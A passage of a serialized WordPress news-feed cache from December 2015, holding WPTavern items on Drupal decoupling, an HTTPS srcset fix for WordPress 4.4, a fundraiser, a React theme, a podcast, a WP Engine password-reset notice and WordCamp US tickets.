                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 14 Dec 2015 16:23:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"Matt: Moral Responsibility of Technologists\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=45701\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"http://ma.tt/2015/12/moral-responsibility-of-technologists/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:750:\"

                                                                By allowing the government to construct a massive surveillance apparatus, the field had abused the public trust. […]

                                                                \n

                                                                My sense is that politics is there, whether one acknowledges it or not. When you have an ostensibly apolitical department, but you scratch beneath the covers and discover that three-quarters of the faculty are funded by the Department of Defense, well, in fact that’s not apolitical. That is very much working in support of a particular ethos, and one simply hasn’t called it forth.

                                                                \n

                                                                From The Moral Failure of Computer Scientists in the Atlantic.

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 13 Dec 2015 21:50:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"WPTavern: Drupal Community Considering a Decoupled Architecture\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49536\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"http://wptavern.com/drupal-community-considering-a-decoupled-architecture\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7663:\"\"SaucerSaucer separation – credit: Memory Alpha\n

                                                                Earlier this week Dries Buytaert, creator and project lead for Drupal, opened up a discussion on his blog about the future of Drupal architecture in a post titled Should we decouple Drupal with a client-side framework?

                                                                \n

                                                                Buytaert contends that users have come to expect application-like experiences from websites, given their experiences interacting with the Facebook news feed, Gmail inbox, and Twitter’s live stream.

                                                                \n

                                                                “Many of Drupal’s administrative interfaces and Drupal sites could benefit from a similarly seamless, instantaneous user experience,” Buytaert said. “As Drupal’s project lead, I ask myself: how can our community feel enabled and encouraged to start building rich user experiences?”

                                                                \n

                                                                The discussion to decouple Drupal with a client-side framework comes at an interesting time, as Matt Mullenweg’s State of the Word address heralded JavaScript as the future of WordPress and the web. His closing remarks encouraged developers to learn JavaScript and start building WordPress-powered apps for the future.

                                                                \n

                                                                A commenter on Buytaert’s post draws a connection to Automattic’s release of Calypso:

                                                                \n

                                                                It feels like this post is at least in part a reaction to WordPress’s announcement of Calypso. Hopefully we can focus on making the decisions that are right for Drupal’s future rather than reacting hastily to what another CMS is doing, particularly when you have talked over and over how WordPress is not Drupal’s true competition.

                                                                \n

                                                                Buytaert maintains that his considerations for Drupal were independently motivated, and this isn’t the first time he’s written about decoupling the back and front end(s).

                                                                \n

                                                                “As for WordPress’ announcement of Calypso — I actually started writing this blog post before Calypso was announced,” he said. “I don’t believe my position was influenced by Calypso.”

                                                                \n

                                                                Buytaert prefaced this discussion with the fact that users have come to take application-like experiences for granted as the baseline for interaction on websites. The entire web is moving in this direction and CMS’s like Drupal and WordPress are now forced to climb this mountain if they want to remain relevant. Both projects are playing from behind, trying to catch up to users expectations.

                                                                \n

                                                                The Challenge of Standardizing a Framework

                                                                \n

                                                                In many ways the discussion on Buytaert’s post is pertinent to where WordPress is headed, especially the consideration to standardize on a particular framework.

                                                                \n

                                                                Buytaert advocates for a progressive decoupling for Drupal’s admin and end user experience while also enabling fully decoupled experiences to be built on top of the platform. He proposes that the best way to do this is “to formally standardize on a full-featured MV* framework (e.g. Angular, Ember, Backbone, and Knockout) or a component-based view library (e.g. React, Vue, and Riot).”

                                                                \n

                                                                As he is not a front-end developer, Buytaert is soliciting input from the Drupal community on what framework would work best for progressive decoupling. He also acknowledges reasons why standardizing a particular framework might be inadvisable in the long run:

                                                                \n

                                                                Despite the potential benefits, there are also good reasons not to embrace a single client-side framework. New front-end frameworks are being created at what feels like an unsustainable pace; every nine months there is a new kid on the block. It’s hard for a project as large as Drupal to embrace a single technology when there is no guarantee of its longevity.

                                                                \n

                                                                Nevertheless, Buytaert believes that a thoughtful selection and periodic reassessment of the framework can overcome these drawbacks.

                                                                \n

                                                                When encouraging WordPress developers to learn JavaScript, Matt Mullenweg did not identify a single framework but left it open. Since Automattic’s Calypso is built on React, it seems to be an early favorite.

                                                                \n

                                                                If WordPress core ends up adopting the technology behind Calypso (or a Calypso-like alternative) to deliver a better publishing experience, will core standardize a framework/library or will it continue to enable and encourage extension developers to use any framework?

                                                                \n

                                                                One commenter points out potential problems with Drupal selecting a framework, which some may perceive as an official endorsement:

                                                                \n

                                                                There are already a lot of enterprise projects using a decoupled Drupal approach and naturally they use a lot of different frameworks, but the one I see used the most is React. In fact on the project I’m working on right now, the organization is going all in with React. If Drupal settled on Angular, for example, how would it affect the organizations that are making big investments in other frameworks? Maybe I don’t understand completely how it might work, but the choice of a single framework seems like it could be divisive and disruptive – disruptive in a bad way, not the SV way.

                                                                \n

                                                                I think making decoupled architectures easier is great and should be something Drupal does, but it should do so in a way that is agnostic about the FE framework used.

                                                                \n

                                                                Buytaert identifies a few alternatives to shipping a client-side framework with Drupal core, including recommending a framework but not shipping with it, or including it in core but making it easy to replace with the developer’s choice of another framework.

                                                                \n

                                                                His post and the comments that follow are the beginning of a lively, thoughtful discussion that will help shape the future of Drupal development. Today Buytaert is calling for proposals that would outline a prototype for a working version of progressive decoupling.

                                                                \n

                                                                Would be interested in reading a proposal on how to prototype a working version of progressive decoupling: https://t.co/tJxT66cKoy #drupal

                                                                \n

                                                                — Dries Buytaert (@Dries) December 11, 2015

                                                                \n

                                                                \n

                                                                Both WordPress and Drupal are currently engaged in the struggle to make the technological leap to provide more application-like experiences for users. The conversation surrounding decoupling Drupal’s architecture is an important one for WordPress developers to follow and learn from.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 11 Dec 2015 22:26:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: How to Fix Images Not Loading in WordPress 4.4 While Using SSL\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49558\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://wptavern.com/how-to-fix-images-not-loading-in-wordpress-4-4-while-using-ssl\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4554:\"

                                                                If you notice images don’t load after upgrading to WordPress 4.4 and you use SSL on the frontend, you’re not alone. In a thread on the WordPress.org support forum, Brokkr explains the crux of the problem:

                                                                \n

                                                                I recently switched my WordPress site to https after getting certificates from Let’s Encrypt. Using 4.3.1 all content was https.

                                                                \n

                                                                After upgrading to 4.4 images no longer load and the browser complains about mixed content. Instead of an image,I get a filename printed out. Inspecting the filename-element in Chrome or Firefox gets me this

                                                                \n

                                                                <img width=\"984\" height=\"615\" src=\"https://brokkr.net/wp-content/uploads/2015/11/22100041369_591b31367d_b_enigma1-984x615.jpg\" class=\"attachment-post-thumbnail size-post-thumbnail wp-post-image\" alt=\"22100041369_591b31367d_b_enigma1\" srcset=\"http://brokkr.net/wp-content/uploads/2015/11/22100041369_591b31367d_b_enigma1-300x188.jpg 300w, http://brokkr.net/wp-content/uploads/2015/11/22100041369_591b31367d_b_enigma1.jpg 1024w, http://brokkr.net/wp-content/uploads/2015/11/22100041369_591b31367d_b_enigma1-984x615.jpg 984w\" sizes=\"(max-width: 984px) 100vw, 984px\">

                                                                \n

                                                                As you can see, the image’s src is correctly set to https, whereas the srcset attribute is un-encrypted.

                                                                \n

                                                                Chris Cree who experienced the same problem discovered that the WP_SITEURL and WP_HOME constants in the wp-config.php file were configured to structure URLs with http instead of https. Cree suggests users check their settings to see which URL type is configured. If both the WordPress address and Site URLs don’t show https, it’s likely causing issues with responsive images in WordPress 4.4.

                                                                \n\"URLURL Settings in WordPress\n

                                                                Joe McGill, who helped lead the effort to get responsive images into WordPress, also responded in the forum thread and confirms Cree’s suggestion is correct, “If you’re running HTTPS on the front end, you should change the URLS for your home and site URL in Settings > General so they use the HTTPS scheme,” he said.

                                                                \n

                                                                McGill confirms that the issue is related to a bug in the way WordPress builds URLs. Even though the solution in the trac ticket is one line of code, McGill says it will break a lot of site configurations. If changing the settings doesn’t work or you don’t have access to the settings page, you can add this snippet of code to the functions.php file or add it as a separate plugin.

                                                                \n
                                                                /*\n * Force URLs in srcset attributes into HTTPS scheme.\n * This is particularly useful when you\'re running a Flexible SSL frontend like Cloudflare\n */\nfunction ssl_srcset( $sources ) {\n  foreach ( $sources as &$source ) {\n    $source[\'url\'] = set_url_scheme( $source[\'url\'], \'https\' );\n  }\n\n  return $sources;\n}\nadd_filter( \'wp_calculate_image_srcset\', \'ssl_srcset\' );\n
                                                                \n

                                                                The solutions described above should work for most people serving content over SSL unless you’re using  CloudFlare. If you still encounter problems with images not loading after applying the fix, I encourage you to create your own thread in the WordPress support forum.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 11 Dec 2015 21:15:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"WPTavern: Help Edward Caissie’s Wife Receive Medical Treatment and Equipment\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49541\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"http://wptavern.com/help-edward-caissies-wife-receive-medical-treatment-and-equipment\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2301:\"

                                                                It’s that time of year where generosity goes a long way, especially to those who need it most. Edward Caissie, also known as @JellyBeen, is in need of the WordPress community’s generosity. His wife, Terri Caissie, was diagnosed with Hashimoto’s Encephalopathy (Autoimmune) with Progressive Cerebella Ataxia on January 22, 2015. Her immune system is attacking her own body.

                                                                \n\"YouCaringTerri Caissie’s YouCaring Page\n

                                                                This disease is exceptionally rare with roughly 200-300 people worldwide diagnosed. Edward has set up a YouCaring page for his wife asking for $2,500 to pay for medical treatment and devices. Here are a few of the symptoms Terri is experiencing due to the disease:

                                                                \n
                                                                  \n
                                                                • Stuttering when meeting new people.
                                                                • \n
                                                                • Typing words backwards without knowing it.
                                                                • \n
                                                                • Pronouncing words backwards in sentences.
                                                                • \n
                                                                • Short term memory loss.
                                                                • \n
                                                                • Loss of basic math skills.
                                                                • \n
                                                                • Medications impacting kidney function.
                                                                • \n
                                                                \n

                                                                If you can’t afford to make a monetary donation, spreading awareness of the disease is the next best thing. This can be accomplished in a number of ways through social media, blogs, and local media. Terri has never asked for financial help but she’s out of options, “It’s what I need to do to survive as I can no longer work,” she said.

                                                                \n

                                                                Edward is an active member of the Theme Review team, Lead Happiness Engineer for NextGEN Gallery, and a great, longstanding member of the WordPress community. Please consider helping him and his wife this holiday season by donating to their YouCaring page.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 11 Dec 2015 18:09:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WPTavern: Anadama: An Example WordPress Recipe Theme Based on React\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49509\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"http://wptavern.com/anadama-an-example-wordpress-recipe-theme-based-on-react\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2821:\"

                                                                \"react\"

                                                                \n

                                                                Since Matt Mullenweg gave the WordPress community a homework assignment to “Learn JavaScript, deeply,” links to tutorials and training courses have been flying around. Once you have grasped some of the basics, one of the best ways to learn is to start building a small project.

                                                                \n

                                                                If you’re looking to explore adding JavaScript to WordPress theming, check out Anadama, an experimental React-based theme that uses the WP REST API to deliver content.

                                                                \n

                                                                Anadama was designed to display recipe content in a vintage recipe book style. This niche theme is well-suited to presentation as a single-page app, since it has no comments or widgets. The homepage features a menu and post titles that pop up as recipe cards.

                                                                \n

                                                                \"single-recipe\"

                                                                \n

                                                                Anadama is a project still in progress, created through the collaborative efforts of developer Kelly Dwan and designer Mel Choyce, authors of popular themes Flounder and Aventurine.

                                                                \n

                                                                The theme is small project where you can see an example of how React might fit into a WordPress theme. It requires the REST API plugin and WP API Menus. If you want to take it for a spin and experiment for yourself, clone the theme’s GitHub repo to your test install and then run npm and gulp to install and build the JavaScript and CSS files. If you prefer a more traditional blog example, Dwan recommends checking out her Foxhound theme on GitHub.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 10 Dec 2015 20:34:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: WPWeekly Episode 216 – WordCamp US 2015 Recap Roundtable\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=49524&preview_id=49524\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"http://wptavern.com/wpweekly-episode-216-wordcamp-us-2015-recap-roundtable\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2569:\"

                                                                In this episode of WordPress Weekly, Marcus Couch and I are joined by Michele Butcher, Nikhil Vimil, Kiko Doran, and Chris Wiegman as we recap the first annual WordCamp US. We discuss the venue and share our favorite sessions of the event. We also discuss a number of items from Matt Mullenweg’s State of The Word presentation. Last but not least are Marcus’ plugin picks of the week.

                                                                \n

                                                                Stories Discussed:

                                                                \n

                                                                WordPress 4.4 “Clifford” Featuring Responsive Images, Twenty Sixteen, and More

                                                                \n

                                                                Plugins Picked By Marcus:

                                                                \n

                                                                Popup for Contact Form 7 by Aiyaz Khorajia, from India, shows a popup when a form is submitted through Contact Form 7. You can customize the popup title, message, and colors from the backend.

                                                                \n

                                                                Reset WP by Nikunj Soni, from India, resets the WP Database to a default installation. It resets only the database and does not modify or delete any files.

                                                                \n

                                                                Jock On Air Now (aka JOAN) by G&D Enterprises, in Brooklyn, NY, lets site admins manage and display a rotating programming schedule for radio or TV. Jock on air now(Joan) displays the name of the current show and the DJ or host in a given time-slot. It also displays the show/jock for the next time-slot. If nothing is scheduled, it displays a custom message.

                                                                \n

                                                                WPWeekly Meta:

                                                                \n

                                                                Next Episode: Wednesday, December 16th 9:30 P.M. Eastern

                                                                \n

                                                                Subscribe To WPWeekly Via Itunes: Click here to subscribe

                                                                \n

                                                                Subscribe To WPWeekly Via RSS: Click here to subscribe

                                                                \n

                                                                Subscribe To WPWeekly Via Stitcher Radio: Click here to subscribe

                                                                \n

                                                                Listen To Episode #216:
                                                                \n

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 10 Dec 2015 20:02:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"WPTavern: WP Engine Security Breach: Customer Credentials Exposed\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49499\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"http://wptavern.com/wp-engine-security-breach-customer-credentials-exposed\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2431:\"

                                                                \"wp-engine\"

                                                                \n

                                                                WP Engine customers received an urgent notification in their inboxes Wednesday evening regarding a security breach.

                                                                \n

                                                                At WP Engine we are committed to providing robust security. We are writing today to let you know that we learned of an exposure involving some of our customers’ credentials. Out of an abundance of caution, we are proactively taking security measures across our entire customer base.

                                                                \n

                                                                WP Engine currently has no evidence that customer information was used inappropriately but has invalidated customer passwords as a precaution. The following five passwords associated with customer accounts will have to be reset:

                                                                \n
                                                                  \n
                                                                • WP Engine User Portal
                                                                • \n
                                                                • WordPress Database
                                                                • \n
                                                                • SFTP
                                                                • \n
                                                                • Original WP-Admin Account
                                                                • \n
                                                                • Password Protected Installs and Transferable Installs
                                                                • \n
                                                                \n

                                                                The notice states that WP Engine is taking immediate action on their end but does not include any details. The company apologized for the inconvenience of having to invalidate all customer passwords.

                                                                \n

                                                                Customers took to Twitter to express frustration and bemoaned the host’s lack of two-factor authentication.

                                                                \n

                                                                @wpengine What\'s with the lack of 2FA?

                                                                \n

                                                                — Jordan Felle (@jordanfelle) December 10, 2015

                                                                \n

                                                                \n

                                                                Representatives from WP Engine were not able to comment on the situation beyond the official notice that was posted. The company will update customers as soon as the security team learns more from their ongoing investigation. If you are a customer or have clients who host with WP Engine, you will need to reset all your passwords according to the instructions at the bottom of notice.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 10 Dec 2015 05:34:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: Tickets on Sale for WordCamp US 2016 December 2-4 in Philadelphia, PA\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49479\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"http://wptavern.com/tickets-on-sale-for-wordcamp-us-2016-december-2-4-in-philadelphia-pa\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2778:\"\"Ticketsphoto credit: lucky random fate : san francisco (2013)(license)\n

                                                                Despite WordCamp US 2015 ending less than a week ago, general admission tickets are on sale for WordCamp US 2016. The event is scheduled for December 2nd-4th in Philadelphia, PA at the Pennsylvania Convention Center. Tickets are $40 each and grant attendees access to both days of the event, swag, and lunch.

                                                                \n

                                                                Alx Block, one of the lead organizers of WordCamp US, says other ticket types will be available soon, “ We’ll absolutely offer a micro-sponsorship again, just like the Jawn this year,” he said. The 2015 event sold 2,671 tickets.

                                                                \n
                                                                  \n
                                                                • 1,788 General Admission
                                                                • \n
                                                                • 18 Jawn Microsponsorships
                                                                • \n
                                                                • 865 Live Stream
                                                                • \n
                                                                \n

                                                                The organizing team is hoping to double ticket sales in 2016.

                                                                \n

                                                                Typically, WordCamps sell tickets a month or two from the day of the event. Block explains how WCUS is able to start selling tickets immediately, “We already have the larger logistical pieces in place. We know the location, we’ve signed the contract with both the venue and the official hotel, and we’re really excited to keep the momentum going,” Block said.

                                                                \n

                                                                If you’re undecided as to whether WordCamp US is worth it, I encourage you to read the following recap posts by those who attended.

                                                                \n\n

